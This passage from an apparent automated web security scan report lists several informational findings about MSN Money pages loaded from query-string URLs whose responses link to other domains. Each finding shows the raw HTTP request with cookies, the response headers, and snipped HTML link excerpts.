rue','1');" href="http://money.msn.com/credit-cards/Twitter-credit-card-problem-solver-credit-cards.aspx?GT1=33001&amp;rrurt=1&amp;rrcontrolId=ratCntrlBinary" title="You recommend this" rel="nofollow"><img id="ratCntrlBinaryYesButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/up_normal.gif" title="You recommend this" alt="You recommend this" /><span id="rrBCYesPer" class="rrbpercent">
...[SNIP]...
0');" href="http://money.msn.com/credit-cards/Twitter-credit-card-problem-solver-credit-cards.aspx?GT1=33001&amp;rrurt=0&amp;rrcontrolId=ratCntrlBinary" title="You don't recommend this" rel="nofollow"><img id="ratCntrlBinaryNoButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/down_normal.gif" title="You don't recommend this" alt="You don't recommend this" /><span id="rrBCNoPer" class="rrbpercent">
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XCVWVNin8ahOnxbu6CkILsHwH9Nb0iHEA?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X4Qa8-uoUmEQdtynN8UHyDsm0Gf4yux_w?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XhHKEEqDclSE9c3w1kYC384bKtOH8c9QD?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/Xy9lyrB9uNmQYnrDXykw1bou-4mmDzNFp?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XPfeT1kpYS7Wn-RcQ1SZR5hEkyQXJ2qN6?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X4IURpi95kG_DlLZcfdgJaIP5Cdx2N033?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XHbIFZX69e-qNzxvkIyimvEbvjpCVpW6S?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XGoG-LEpQfUy6k-KMKBYowSsHdlMkNkJh?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XTTBewGalOM4CqQLRfE7MRRgpeJSYNQ8u?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X7V_Rv-PpYCuEZxovOFi02qEgNUb2tziQ?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XRKEouVn3wnqlwUUAegcxQYTdNJy-p03z?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<span>Please help us to maintain a healthy and vibrant community by reporting any illegal or inappropriate behavior. If you believe a message violates the<a id="raconductcode" class="iucrptlnk" href="http://help.live.com/help.aspx?mkt=en-gb&amp;project=tou&amp;querytype=keyword&amp;query=coc" title="View the code of conduct in a new window">Code of Conduct</a>
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm">click for restrictions</a>). Real-time quotes provided by <a href="http://www.batstrading.com/">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/">Zacks Investment Research</a>. IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml">Hoover's Inc</a>. Index membership data provided by <a href="http://www.six-telekurs.com/tkfich_index/tkfich_home.htm">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/">Nomura Research Institute Ltd</a>.; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
</a><a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj">Feedback</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=what+is+the+best+way+to+establish+credit&amp;form=money3">What is the best way to establish credit?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=what+is+a+fico+credit+score&amp;form=money3">What is a FICO credit score?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=perfect+credit+score&amp;form=money3">What is a perfect credit score?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=How+do+I+get+a+free+annual+credit+report&amp;go=&amp;form=money3">How do I get a free credit report?</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=how+do+i+dispute+items+on+my+credit+report&amp;form=money3">How do I dispute items on my credit report?</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-2482-Salaries-Promotions-5-Secrets-to-climbing-the-ladder-faster/?SiteId=cbmsnhp42482&amp;sc_extcmp=JS_2482_home1&amp;ocid=xnetr2-3">5 secrets to climbing the ladder faster</a>
...[SNIP]...
<li class="ter"><a href="http://www.slate.com/id/2282620?ocid=xnetr2-4">Is Facebook making us miserable?</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">Privacy</a>
...[SNIP]...
<li class="first"><a class="openpopup" rel="width=800,height=600,resizeable=yes,status=no,titlebar=no,toolbar=no,scrollbars=yes" href="http://onlinehelp.microsoft.com/en-us/msn/money.aspx">Help</a></li><li><a href="http://advertising.microsoft.com/msn/">About our ads</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&amp;resize=false">Feedback</a>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

22.188. http://money.redacted/how-to-invest/default-dyn.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /how-to-invest/default-dyn.aspx

Issue detail

The page was loaded from a URL containing a query string. The response contains links to other domains, shown in the response excerpt below.

Request

GET /how-to-invest/default-dyn.aspx?cp-documentid=6782985 HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM07
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 17:59:21 GMT
Content-Length: 41436

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/msn/default.aspx">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/">Sports</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="hotmail"><a href="http://mail.live.com/" class="inbox">Hotmail</a></li><li><a class="msgr" href="http://explore.live.com/windows-live-messenger">Messenger</a></li><li class="last"><a href="http://www.bing.com/search/?FORM=MSMONY&amp;mkt=en-US">Bing</a></li></ul><div class="myhp"><a href="http://www.myhomeredacted">Make MSN your homepage</a>
...[SNIP]...
<li class="last"><a href="http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx">Help</a>
...[SNIP]...
<li class="pipe signin"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296410362&amp;rver=6.1.6195.0&amp;wp=MBI&amp;wreply=http:%2F%2Fmoney.redacted%2Fhow-to-invest%2Fdefault-dyn.aspx%3Fcp-documentid%3D6782985&amp;lc=1033&amp;id=250710" class="dMSNME_1">Sign in</a>
...[SNIP]...
</span><a href="http://www.bing.com/search" class="last">Web</a>
...[SNIP]...
<li><a href="https://secure.bundle.com/msn">MY MONEY</a>
...[SNIP]...
<area href="http://money.msn.com/how-to-invest/default.aspx" alt="New Investor Center" shape="rect" coords="15,1,263,72" /><area href="http://clk.atdmt.com/BEL/go/115817003/direct/01/" alt="Sharebuilder" shape="rect" coords="750,10,894,68" /></map>
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm">click for restrictions</a>). Real-time quotes provided by <a href="http://www.batstrading.com/">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/">Zacks Investment Research</a>. IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml">Hoover's Inc</a>. Index membership data provided by <a href="http://www.six-telekurs.com/tkfich_index/tkfich_home.htm">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/">Nomura Research Institute Ltd</a>.; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
</a><a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj">Feedback</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=how+to+file+income+taxes+electronically&amp;form=MONEY3" class="opennew">How to file your taxes electronically</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=smart+phones+ID+theft&amp;form=MONEY3" class="opennew">Is your smart phone safe from ID thieves?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=cars+with+highest+resale+value&amp;form=MONEY3" class="opennew">Cars with the highest resale value</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=surprising+things+home+insurance+doesn%27t+cover+-medicare&amp;form=MONEY3" class="opennew">Surprising things home insurance doesn't cover</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=how+to+convert+a+traditional+ira+to+a+roth&amp;form=MONEY3" class="opennew">How to convert a traditional IRA to a Roth</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-2482-Salaries-Promotions-5-Secrets-to-climbing-the-ladder-faster/?SiteId=cbmsnhp42482&amp;sc_extcmp=JS_2482_home1&amp;ocid=xnetr2-3">5 secrets to climbing the ladder faster</a>
...[SNIP]...
<li class="ter"><a href="http://www.slate.com/id/2282620?ocid=xnetr2-4">Is Facebook making us miserable?</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">Privacy</a>
...[SNIP]...
<li class="first"><a class="openpopup" rel="width=800,height=600,resizeable=yes,status=no,titlebar=no,toolbar=no,scrollbars=yes" href="http://onlinehelp.microsoft.com/en-us/msn/money.aspx">Help</a></li><li><a href="http://advertising.microsoft.com/msn/">About our ads</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&amp;resize=false">Feedback</a>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

22.189. http://money.redacted/how-to-invest/default-dyn.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /how-to-invest/default-dyn.aspx

Issue detail

The page was loaded from a URL containing a query string. The response contains links to other domains, shown in the response excerpt below.

Request

GET /how-to-invest/default-dyn.aspx?cp-documentid=6782985 HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM05
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 02:11:55 GMT
Content-Length: 41436

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/msn/default.aspx">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/">Sports</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="hotmail"><a href="http://mail.live.com/" class="inbox">Hotmail</a></li><li><a class="msgr" href="http://explore.live.com/windows-live-messenger">Messenger</a></li><li class="last"><a href="http://www.bing.com/search/?FORM=MSMONY&amp;mkt=en-US">Bing</a></li></ul><div class="myhp"><a href="http://www.myhomeredacted">Make MSN your homepage</a>
...[SNIP]...
<li class="last"><a href="http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx">Help</a>
...[SNIP]...
<li class="pipe signin"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296353516&amp;rver=6.1.6195.0&amp;wp=MBI&amp;wreply=http:%2F%2Fmoney.redacted%2Fhow-to-invest%2Fdefault-dyn.aspx%3Fcp-documentid%3D6782985&amp;lc=1033&amp;id=250710" class="dMSNME_1">Sign in</a>
...[SNIP]...
</span><a href="http://www.bing.com/search" class="last">Web</a>
...[SNIP]...
<li><a href="https://secure.bundle.com/msn">MY MONEY</a>
...[SNIP]...
<area href="http://money.msn.com/how-to-invest/default.aspx" alt="New Investor Center" shape="rect" coords="15,1,263,72" /><area href="http://clk.atdmt.com/BEL/go/115817003/direct/01/" alt="Sharebuilder" shape="rect" coords="750,10,894,68" /></map>
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm">click for restrictions</a>). Real-time quotes provided by <a href="http://www.batstrading.com/">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/">Zacks Investment Research</a>. IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml">Hoover's Inc</a>. Index membership data provided by <a href="http://www.six-telekurs.com/tkfich_index/tkfich_home.htm">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/">Nomura Research Institute Ltd</a>.; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
</a><a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj">Feedback</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=how+to+file+income+taxes+electronically&amp;form=MONEY3" class="opennew">How to file your taxes electronically</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=smart+phones+ID+theft&amp;form=MONEY3" class="opennew">Is your smart phone safe from ID thieves?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=cars+with+highest+resale+value&amp;form=MONEY3" class="opennew">Cars with the highest resale value</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=surprising+things+home+insurance+doesn%27t+cover+-medicare&amp;form=MONEY3" class="opennew">Surprising things home insurance doesn't cover</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=how+to+convert+a+traditional+ira+to+a+roth&amp;form=MONEY3" class="opennew">How to convert a traditional IRA to a Roth</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-2482-Salaries-Promotions-5-Secrets-to-climbing-the-ladder-faster/?SiteId=cbmsnhp42482&amp;sc_extcmp=JS_2482_home1&amp;ocid=xnetr2-3">5 secrets to climbing the ladder faster</a>
...[SNIP]...
<li class="ter"><a href="http://www.slate.com/id/2282620?ocid=xnetr2-4">Is Facebook making us miserable?</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">Privacy</a>
...[SNIP]...
<li class="first"><a class="openpopup" rel="width=800,height=600,resizeable=yes,status=no,titlebar=no,toolbar=no,scrollbars=yes" href="http://onlinehelp.microsoft.com/en-us/msn/money.aspx">Help</a></li><li><a href="http://advertising.microsoft.com/msn/">About our ads</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&amp;resize=false">Feedback</a>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

22.190. http://money.redacted/how-to-invest/video.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /how-to-invest/video.aspx

Issue detail

The page was loaded from a URL containing a query string. The response contains links to other domains, shown in the response excerpt below.

Request

GET /how-to-invest/video.aspx?vid=cc4809b5-8cb5-40ba-9237-cd1098c130ea&from=en-us_money HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM06
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 02:12:01 GMT
Content-Length: 46426

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/msn/default.aspx">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/">Sports</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="hotmail"><a href="http://mail.live.com/" class="inbox">Hotmail</a></li><li><a class="msgr" href="http://explore.live.com/windows-live-messenger">Messenger</a></li><li class="last"><a href="http://www.bing.com/search/?FORM=MSMONY&amp;mkt=en-US">Bing</a></li></ul><div class="myhp"><a href="http://www.myhomeredacted">Make MSN your homepage</a>
...[SNIP]...
<li class="last"><a href="http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx">Help</a>
...[SNIP]...
<li class="pipe signin"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296353521&amp;rver=6.1.6195.0&amp;wp=MBI&amp;wreply=http:%2F%2Fmoney.redacted%2Fhow-to-invest%2Fvideo.aspx%3Fvid%3Dcc4809b5-8cb5-40ba-9237-cd1098c130ea%26from%3Den-us_money&amp;lc=1033&amp;id=250710" class="dMSNME_1">Sign in</a>
...[SNIP]...
</span><a href="http://www.bing.com/search" class="last">Web</a>
...[SNIP]...
<li><a href="https://secure.bundle.com/msn">MY MONEY</a>
...[SNIP]...
<area href="http://money.msn.com/how-to-invest/default.aspx" alt="New Investor Center" shape="rect" coords="15,1,263,72" /><area href="http://clk.atdmt.com/BEL/go/115817003/direct/01/" alt="Sharebuilder" shape="rect" coords="750,10,894,68" /></map>
...[SNIP]...
</a><a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj">Feedback</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=how+to+file+income+taxes+electronically&amp;form=MONEY3" class="opennew">How to file your taxes electronically</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=smart+phones+ID+theft&amp;form=MONEY3" class="opennew">Is your smart phone safe from ID thieves?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=cars+with+highest+resale+value&amp;form=MONEY3" class="opennew">Cars with the highest resale value</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=surprising+things+home+insurance+doesn%27t+cover+-medicare&amp;form=MONEY3" class="opennew">Surprising things home insurance doesn't cover</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=how+to+convert+a+traditional+ira+to+a+roth&amp;form=MONEY3" class="opennew">How to convert a traditional IRA to a Roth</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-2482-Salaries-Promotions-5-Secrets-to-climbing-the-ladder-faster/?SiteId=cbmsnhp42482&amp;sc_extcmp=JS_2482_home1&amp;ocid=xnetr2-3">5 secrets to climbing the ladder faster</a>
...[SNIP]...
<li class="ter"><a href="http://www.slate.com/id/2282620?ocid=xnetr2-4">Is Facebook making us miserable?</a>
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm">click for restrictions</a>). Real-time quotes provided by <a href="http://www.batstrading.com/">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/">Zacks Investment Research</a>. IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml">Hoover's Inc</a>. Index membership data provided by <a href="http://www.six-telekurs.com/tkfich_index/tkfich_home.htm">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/">Nomura Research Institute Ltd</a>.; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">Privacy</a>
...[SNIP]...
<li class="first"><a class="openpopup" rel="width=800,height=600,resizeable=yes,status=no,titlebar=no,toolbar=no,scrollbars=yes" href="http://onlinehelp.microsoft.com/en-us/msn/money.aspx">Help</a></li><li><a href="http://advertising.microsoft.com/msn/">About our ads</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&amp;resize=false">Feedback</a>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

22.191. http://money.redacted/how-to-invest/video.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /how-to-invest/video.aspx

Issue detail

The page was loaded from a URL containing a query string. The response contains links to other domains, shown in the response excerpt below.

Request

GET /how-to-invest/video.aspx?vid=cc4809b5-8cb5-40ba-9237-cd1098c130ea&from=en-us_money HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM07
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 17:59:31 GMT
Content-Length: 46426

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/msn/default.aspx">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/">Sports</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="hotmail"><a href="http://mail.live.com/" class="inbox">Hotmail</a></li><li><a class="msgr" href="http://explore.live.com/windows-live-messenger">Messenger</a></li><li class="last"><a href="http://www.bing.com/search/?FORM=MSMONY&amp;mkt=en-US">Bing</a></li></ul><div class="myhp"><a href="http://www.myhomeredacted">Make MSN your homepage</a>
...[SNIP]...
<li class="last"><a href="http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx">Help</a>
...[SNIP]...
<li class="pipe signin"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296410372&amp;rver=6.1.6195.0&amp;wp=MBI&amp;wreply=http:%2F%2Fmoney.redacted%2Fhow-to-invest%2Fvideo.aspx%3Fvid%3Dcc4809b5-8cb5-40ba-9237-cd1098c130ea%26from%3Den-us_money&amp;lc=1033&amp;id=250710" class="dMSNME_1">Sign in</a>
...[SNIP]...
</span><a href="http://www.bing.com/search" class="last">Web</a>
...[SNIP]...
